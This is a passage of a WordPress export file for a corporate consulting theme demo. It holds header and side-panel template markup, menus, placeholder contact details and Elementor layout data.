							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>						
										  Mon - Sat: 8.00 - 18.00
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>						
										411 University St, Seattle
									</li>
								<li>
					<a href="tel:+1-800-456-478-23">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>						
										+1-800-456-478-23
											</a>
									</li>
						</ul>
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>
			<a href="#" role="button">
						FREE QUOTE
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="Maxbizz Corporate">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-2214"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/">Home</a></li>
<li id="menu-item-1704"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1748"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/about-us/">About Us</a></li>
	<li id="menu-item-1770"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Our Services 1</a></li>
	<li id="menu-item-1765"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1754"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1755"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/">Our Team</a></li>
	<li id="menu-item-1756"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1752"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/elements/">Elements</a></li>
	<li id="menu-item-1757"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/typography/">Typography</a></li>
	<li id="menu-item-1753"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/faqs/">FAQs</a></li>
	<li id="menu-item-1749"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/404-2/">404</a></li>
	<li id="menu-item-1750"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1768"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1771"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1769"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1767"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1774"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1766"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Services</a>
<ul>
	<li id="menu-item-1764"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1763"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1762"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1761"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1760"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1759"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1758"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog</a>
<ul>
	<li id="menu-item-1772"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog List</a></li>
	<li id="menu-item-1773"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1751"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz-corporate/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>217</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 06:55:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 06:55:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-4]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2bd5f14","elType":"section","settings":{"content_position":"middle","structure":"21","background_background":"classic","background_color":"#0B2A41","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"f191d30","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"6d41460","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"  Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_color":"#55BB53","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"icon_typography_font_weight":"500"},"elements":[],"widgetType":"icon-list"}],"isInner":false},{"id":"eb1b801","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"99b486b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_spacing":{"unit":"px","size":20,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","icon_color":"custom","hover_border_color":"#4B82FB","icon_secondary_color":"#8497A5","hover_secondary_color":"#FFFFFF","icon_padding":{"unit":"em","size":0,"sizes":[]}},"elements":[],"widgetType":"social-icons"},{"id":"eb90cd2","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","background_color":"#55BB53","hover_color":"#0B2A41","button_background_hover_color":"#F5F5F5","button_hover_border_color":"#55BB53","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"29","bottom":"12","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"34","isLinked":false},"typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"36d15d3","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"5bfa0e8","elType":"column","settings":{"_column_size":50,"_inline_size":30},"elements":[{"id":"4aa2514","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":2223},"_padding":{"unit":"px","top":"26","right":"0","bottom":"27","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"b62b09b","elType":"column","settings":{"_column_size":50,"_inline_size":70,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"d943b8e","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#55BB53","menu_typography_typography":"custom","menu_typography_font_family":"Open Sans","smenu_typography_typography":"custom","smenu_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"imenu"},{"id":"64ad134","elType":"widget","settings":{"bg_btn":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;s:27:"icon_typography_font_weight";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:5:"align";i:2;s:17:"_ot_content_align";i:2;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:12:"icon_padding";i:1;}s:20:"section_social_hover";a:2:{s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:13:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:25:"button_hover_border_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:3:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;}s:19:"style_smenu_section";a:2:{s:27:"smenu_typography_typography";i:1;s:28:"smenu_typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Side Panel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/side-panel/</link>
		<pubDate>Fri, 24 Apr 2020 07:40:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=253</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
		Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.		
			<h4>Gallery</h4>		
			<figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-10" href='https://maxbizz.s3.amazonaws.com/images/project-10.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-10-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-12" href='https://maxbizz.s3.amazonaws.com/images/project-12.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-12-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-9" href='https://maxbizz.s3.amazonaws.com/images/project-9.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-9-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-7" href='https://maxbizz.s3.amazonaws.com/images/project-7.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-7-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-6" href='https://maxbizz.s3.amazonaws.com/images/project-6.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-5" href='https://maxbizz.s3.amazonaws.com/images/project-5.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" /></a>
			</figure>
			<h4>Contact</h4>		
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23"></a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
				</h6>
								<p>411 University St, Seattle</p>
				<a href="mailto:%20maxbizz@mail.com">
								</a>
				<h6>
					<a href="mailto:%20maxbizz@mail.com"></a>
				</h6>
								<p>maxbizz@mail.com</p>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>253</wp:post_id>
		<wp:post_date><![CDATA[2020-04-24 07:40:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-04-24 07:40:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[side-panel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"abdb372","elType":"section","settings":{"padding":{"unit":"px","top":"40","right":"40","bottom":"40","left":"40","isLinked":true},"background_background":"classic","background_color":"#282828"},"elements":[{"id":"42dd159","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"99ef7b3","elType":"widget","settings":{"logo_width":{"unit":"px","size":145,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":377}},"elements":[],"widgetType":"ilogo"},{"id":"4408930","elType":"widget","settings":{"editor":"Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.","_margin":{"unit":"px","top":"0","right":"0","bottom":"27","left":"0","isLinked":false},"text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"},{"id":"561f157","elType":"widget","settings":{"title":"Gallery","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","title_color":"#FFFFFF"},"elements":[],"widgetType":"heading"},{"id":"0979c03","elType":"widget","settings":{"wp_gallery":[{"id":800,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-10.jpg"},{"id":803,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-12.jpg"},{"id":811,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-9.jpg"},{"id":819,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-7.jpg"},{"id":827,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-6.jpg"},{"id":823,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-5.jpg"}],"gallery_columns":"3","thumbnail_size":"maxbizz-portfolio-thumbnail-grid","open_lightbox":"yes"},"elements":[],"widgetType":"image-gallery"},{"id":"81b5457","elType":"widget","settings":{"title":"Contact","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","title_color":"#FFFFFF"},"elements":[],"widgetType":"heading"},{"id":"dfc527a","elType":"widget","settings":{"title_text":"","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#FFFFFF","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left","description_typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"a86f8fa","elType":"widget","settings":{"title_text":"","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":15,"sizes":[]},"title_typography_font_weight":"500","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#606060","title_typography_font_family":"Inter","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"c0cbcd5","elType":"widget","settings":{"title_text":"","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"ca934ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#E40000"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#FF8523","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.6999999999999999555910790149937383830547332763671875,"sizes":[]},"icon_spacing":{"unit":"px","size":12,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_animation":"float","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-24]]></wp:meta_value>
		</wp:postmeta>
